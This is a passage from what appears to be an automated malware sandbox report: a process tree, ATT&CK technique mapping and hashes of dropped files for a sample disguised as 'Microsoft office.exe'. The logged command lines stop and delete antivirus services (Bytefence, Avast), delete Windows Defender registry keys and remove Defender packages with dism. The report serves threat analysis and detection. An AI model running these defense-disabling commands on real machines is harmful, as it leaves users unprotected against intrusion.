- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\sc.exe
sc stop Bytefenceservice
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1764

C:\Windows\SysWOW64\sc.exe
sc config Bytefenceservice start= disabled
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2036

C:\Windows\SysWOW64\sc.exe
sc delete Bytefenceservice
4⤵
- Launches sc.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2008

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Bytefence.exe
4⤵
- Kills process with taskkill
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\sc.exe
sc stop "avast! Tools"
4⤵
- Launches sc.exe
PID:580

C:\Windows\system32\sc.exe
sc config "avast! Tools" start= disabled
4⤵
- Launches sc.exe
PID:1412

C:\Windows\system32\sc.exe
sc delete "avast! Tools"
4⤵
- Launches sc.exe
PID:112

C:\Windows\system32\sc.exe
sc stop "avast! Antivirus"
4⤵
- Launches sc.exe
PID:296

C:\Windows\system32\sc.exe
sc config "avast! Antivirus" start= disabled
4⤵
- Launches sc.exe
PID:1424

C:\Program Files\InstallerX64.exe
"C:\Program Files\InstallerX64.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1BCB.tmp\1BCC.tmp\1BCD.bat "C:\Program Files\InstallerX64.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:364

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:1016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
4⤵
PID:2004

C:\Windows\system32\reg.exe
reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"
5⤵
PID:1912

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI__neutral_neutral_cw5n1h2txyewy" /f
4⤵
PID:1604

C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1296

C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1460

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:744

C:\Windows\system32\reg.exe
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1648

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1836

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1060

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1520

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:748

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1384

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1664

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:904

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1300

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Core-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1900

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1184

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:2036

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1752

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1196

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Nis-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1640

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1092

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:1356

C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~amd64~~\Owners" /f
4⤵
PID:676

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismhost.exe {46B2E577-34B9-4AF4-89A3-F6022FB712B2}
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:584

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\784DD60B-C17F-4E86-AED3-9D4D425937F5\dismhost.exe {781245A3-F951-4894-B4A2-ECF2FB16E10E}
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:740

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1628

C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\EB7D771E-B6C3-4321-8F1A-16451039F157\dismhost.exe {64056711-BE73-4542-B1B7-39077A9BD8A8}
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1764

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\AA47FAFD-C26F-4249-801D-B46DB82C2EA3\dismhost.exe {3C79E263-B682-4DFC-B0E1-0CBD044C52B5}
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:112

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\62FB9DB2-9133-4809-94F1-C30E850FFA2C\dismhost.exe {0F561E13-71E2-411F-AC3A-C0E4A16C8794}
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1660

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1116

C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\CEB8ED30-4469-43B8-845D-136C5A9ACA43\dismhost.exe {5681E6E7-62D7-4F59-8CA9-B048C8416A8E}
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1520

C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~ /NoRestart
4⤵
- Drops file in Windows directory
PID:1496

C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B9176574-69F7-430A-A225-5140D0BB8FF4\dismhost.exe {78FBFFFD-E195-4FF7-85F7-6AAB0BB570B0}
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2036

C:\Program Files\Microsoft office.exe
"C:\Program Files\Microsoft office.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:992

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
1⤵
PID:1196

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Builded.exe
Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
C:\Program Files\InstallerX64.exe
Filesize
91KB

MD5
cc3db2432720f58955baa76ab4708a18

SHA1
256923ae3d9888262be5c548b553182c4400674a

SHA256
023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096

SHA512
ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82

Download Submit
C:\Program Files\Microsoft office.exe
Filesize
3.8MB

MD5
2bc19dd96b42cea3280eb5fe1e949b82

SHA1
d4daeaa890659239a848d36b34e1c5b0d150c42f

SHA256
6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205

SHA512
e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b

Download Submit
C:\Program Files\Microsoft.exe
Filesize
132KB

MD5
5cf52aea15ebdef8a216f5a3d4f44c73

SHA1
b7394c7347b84db2d878e9deb260862d51023dd4

SHA256
479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078

SHA512
230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b

Download Submit
C:\Program Files\installerX32.exe
Filesize
91KB

MD5
c27bdf2ff2a21ec02ed912e7fac3477c

SHA1
5ad38698e859a7853f7bab46c02efd03144fef36

SHA256
3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c

SHA512
1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1BBC.tmp\1BBD.tmp\1BBE.bat
Filesize
4KB

MD5
3c92f725b696f48b1ae5386c6b88147d

SHA1
7d80fab21ff225acdefbe3c33e11d57dbd58244b

SHA256
50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2

SHA512
ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03

Download Submit
C:\Users\Admin\AppData\Local\Temp\1BCB.tmp\1BCC.tmp\1BCD.bat
Filesize
4KB

MD5
a9364ef8f38cb959002706b2cc5ca9b4

SHA1
4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a

SHA256
6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27

SHA512
a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CbsProvider.dll
Filesize
744KB

MD5
efcb002abc3529d71b61e6fb6434566c

SHA1
a25aca0fc9a1139f44329b28dc13c526965d311f

SHA256
b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd

SHA512
10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\CompatProvider.dll
Filesize
179KB

MD5
6a4bd682396f29fd7df5ab389509b950

SHA1
46f502bec487bd6112f333d1ada1ec98a416d35f

SHA256
328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb

SHA512
35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCore.dll
Filesize
283KB

MD5
f2b0771a7cd27f20689e0ab787b7eb7c

SHA1
eb56e313cd23cb77524ef0db1309aebb0b36f7ef

SHA256
7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f

SHA512
5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismCorePS.dll
Filesize
109KB

MD5
5488e381238ff19687fdd7ab2f44cfcc

SHA1
b90fa27ef6a7fc6d543ba33d5c934180e17297d3

SHA256
abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0

SHA512
933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DismHost.exe
Filesize
94KB

MD5
9a821d8d62f4c60232b856e98cba7e4f

SHA1
4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5

SHA256
a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525

SHA512
1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\DmiProvider.dll
Filesize
425KB

MD5
fc2db5842190c6e78a40cd7da483b27c

SHA1
e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0

SHA256
e6c93305d886bff678bd83b715bb5c5cbb376b90b973d9dd6844fac808de5c82

SHA512
d5d32b894a485447d55499a2f1e02a8b33fb74081f225b8e2872995491a37353cf8022f46feeb3ca363b2e172ab89e29ab9a453692d1a964ca08d40230574bf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\FolderProvider.dll
Filesize
52KB

MD5
c9d74156913061be6c51d8fc3acf8e93

SHA1
4a4c6473a478256e4c78b423e918191118e01093

SHA256
af0a38b4e95a50427b215eebc185bb621187e066b8b7373fb960eac0551bec37

SHA512
c12f75a6451881878a7a9ed5de61d157ea36f53aa41abf7660e1cc411b2ddd70ff048a307b1440cfdf1b269aeff77da8cc163ad19e9e3a294a5128f170f37047

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\IntlProvider.dll
Filesize
306KB

MD5
bbb9e4fa2561f6a6e5ccf25da069ac1b

SHA1
2d353ec70c7a13ac5749d2205ac732213505082a

SHA256
b92cf901027901d7066e9ee7ac8f3b48a99cfb3a3ddd8d759cb77295148943c1

SHA512
01f4e6d51a0acb394693191b78cefa28759903036636a1d64f90c60dc59c948c78dd38df6fb2be149245622eadf8b2627c6767bf2aa2e0e56e6b52f0b91cc79e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\LogProvider.dll
Filesize
104KB

MD5
62de64dc805fd98af3ada9d93209f6a9

SHA1
392ba504973d626aaf5c5b41b184670c58ec65a7

SHA256
83c0f61cc8fc01c789c07dd25f58862e0710088e6887716b1be9ee9f149adefc

SHA512
7db48f240df566be9a4b836807f97e8169d58edfa699de69be35b3977e442da3fea4f8b38d359d50f4d5afcf8547c8f66329e5ec855efbc5402ce88458d67e28

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\MsiProvider.dll
Filesize
211KB

MD5
45ff4fa5ca5432bfccded4433fe2a85b

SHA1
858c42499dd9d2198a6489dd310dc5cbff1e8d6e

SHA256
8a85869b2d61bad50d816daf08df080f8039dbeb1208009a73daa7be83d032bd

SHA512
abbe0f673d18cc9a922cfd677e5b88714a3049ad8937f836b5a8b9bddac5ddbad4dc143360efc018dcd3a3440aa3e516b1a97f7cd2fa9a55cb73739dedef1589

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\OSProvider.dll
Filesize
124KB

MD5
e7caed467f80b29f4e63ba493614dbb1

SHA1
65a159bcdb68c7514e4f5b65413678c673d2d0c9

SHA256
2c325e2647eb622983948cc26c509c832e1094639bb7af0fb712583947ad019c

SHA512
34952d8a619eb46d8b7ec6463e1e99f1c641ce61c471997dd959911ae21d64e688d9aa8a78405faa49a652675caf40d8e9e5a07de30257f26da4c65f04e2181e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\dismprov.dll
Filesize
182KB

MD5
8ca117cb9338c0351236939717cb7084

SHA1
baa145810d50fdb204c8482fda5cacaaf58cdad0

SHA256
f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54

SHA512
35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\CbsProvider.dll.mui
Filesize
32KB

MD5
724ee7133b1822f7ff80891d773fde51

SHA1
d10dff002b02c78e624bf83ae8a6f25d73761827

SHA256
d13f068f42074b3104987bfed49fbf3a054be6093908ed5dea8901887dddb367

SHA512
1dfd236537d6592a19b07b5e1624310c67adff9e776e6d2566b9e7db732588988f9ae7352df6c3b53c058807d8ed55fafc2004a2d6dc2f3f6c9e16445699f17b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\CompatProvider.dll.mui
Filesize
12KB

MD5
9085b83968e705a3be5cd7588545a955

SHA1
f0a477b353ca3e20fa65dd86cb260777ff27e1dd

SHA256
fe0719cf624e08b5d6695ee3887358141d11316489c4ea97d2f61a4d2b9060cd

SHA512
b7f12f7ac1e6942f24f4bf35444f623cc93f8a047ebc754b9599d5df16cab4d3745729d11b4a3abfdc06a671e55ac52cac937badd808825906f52885f16f2c1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\DismCore.dll.mui
Filesize
6KB

MD5
f18044dec5b59c82c7f71ecffe2e89ab

SHA1
731d44676a8f5b3b7ad1d402dfdbb7f08bdc40c6

SHA256
a650578a4630e1a49280dc273d1d0bbdca81664a2199e5ab44ec7c5c54c0a35e

SHA512
53c23acddab099508b1e01dcc0d5dc9d4da67bc1765087f4a46b9ac842de065a55bac4c6682da07f5a1d29a3d0c1d92a4310e6b0f838740d919f8285911fa714

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\DmiProvider.dll.mui
Filesize
15KB

MD5
ee8c06cd11b34a37579d118ac5d6fa1d

SHA1
c62f7fb0c6f42321b33ea675c0dfd304b2eb4a15

SHA256
6991fb4bfd6800385a32ac759dd21016421cb13dca81f04ddcaf6bf12a928ccc

SHA512
091cfa7d9b80e92df13ba829372dfb211214f4221e52fbf3f558ebb7f18736ad9ad867ea0d0ddf8938def1b4db64a12d0df37c2eaf41727b997f4905dd41fed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\FolderProvider.dll.mui
Filesize
2KB

MD5
cab37f952682118bac4a3f824c80b6ac

SHA1
6e35b4289927e26e3c50c16cbf87eb3ac6f3b793

SHA256
14bec7c4bb6cf1ee9049ef8820ec88bf78f2af75615f7a3fb265ef4b45c30e4d

SHA512
de9089adaa85f37201526b8619f697be98a7d05353b21b6d835f4d56803732380316359ba8b3c8ca7c14a9bf7cf31a7eff3c866a8f303ef737eb63573e01aa19

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\IntlProvider.dll.mui
Filesize
26KB

MD5
0bffb5e4345198dbf18aa0bc8f0d6da1

SHA1
e2789081b7cf150b63bad62bac03b252283e9fe5

SHA256
b7bcc0e99719f24c30e12269e33a8bf09978c55593900d51d5f8588e51730739

SHA512
590e8016075871846efff8b539e4779a1a628de318c161292c7231ca964a310e0722e44816041786c8620bff5c29ff34c5f35733ee4eac74f3abfae6d3af854a

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\LogProvider.dll.mui
Filesize
5KB

MD5
f909216cf932aeb4f2f9f02e8c56a815

SHA1
c5cafe5f8dad60d3a1d7c75aa2cf575e35a634f2

SHA256
f5c89ba078697cdb705383684af49e07cdd094db962f0649cad23008ae9d6ce2

SHA512
5dca19d54f738486085f11b5a2522073894a97d67e67be0eadbe9dc8944e632ae39b24499d7ff16e88d18166031697a238ead877f12cbb7447acca49c32a184a

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\en-US\dismprov.dll.mui
Filesize
2KB

MD5
9bc5d6eb3e2d31bbdbffe127a1b3cdbf

SHA1
b253025c442aefe338b4c7ebea2f7d808abc9618

SHA256
55e9ae098def76e7388d7d069746dbd136ae243357ece23b77f2365f0b2ff76f

SHA512
f9968554737d181d4b7d0366f40f0c9a2039b59796986964413fa08f031f5529411b2741eb8ea3d8c312112b2038e6a58d891d090a42672c3d1c782b859f2e08

Download Submit
C:\Users\Admin\AppData\Local\Temp\5205C274-B904-4FA0-8D03-19E207944348\wdscore.dll
Filesize
265KB

MD5
7b38d7916a7cd058c16a0a6ca5077901

SHA1
f79d955a6eac2f0368c79f7ba8061e9c58ba99b2

SHA256
3f6dd990e2da5d3bd6d65a72cbfb0fe79eb30b118a8ad71b6c9bb5581a622dce

SHA512
2d22fe535f464f635d42e5b016741b9caf173da372e4563a565fa1e294581f44330c61e08edfe4c08a341ebd708e2ad08614161c0ee54e8dea99452b87d1e710

Download Submit
C:\Windows\Logs\DISM\dism.log
Filesize
152KB

MD5
da1e654bf23e9d993c1aa4d6c86b097e

SHA1
4aaa21de90b3466f175901734f295852d4162955

SHA256
a4b1f5d725de107e0b76be5579732c633629c63770d23a4f178ba7315f567020

SHA512
b053e434e76df2ef63a1519b495ddaf2f7e5b044ae788a809a3a121ca88c799304f53675773f52f8de93db008bf3a657196cbd37593b25bbb85fca4e5169e14b

Download Submit
\Program Files\Builded.exe
Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\Builded.exe
Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\Builded.exe
Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\Builded.exe
Filesize
159KB

MD5
361356a7a0a38b3080b298ff8f3b8c9d

SHA1
1763fa71f4cd842a84600b47ee9b436c417f5c1f

SHA256
b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a

SHA512
0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8

Download Submit
\Program Files\InstallerX64.exe
Filesize
91KB

MD5
cc3db2432720f58955baa76ab4708a18

SHA1
256923ae3d9888262be5c548b553182c4400674a

SHA256
023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096

SHA512
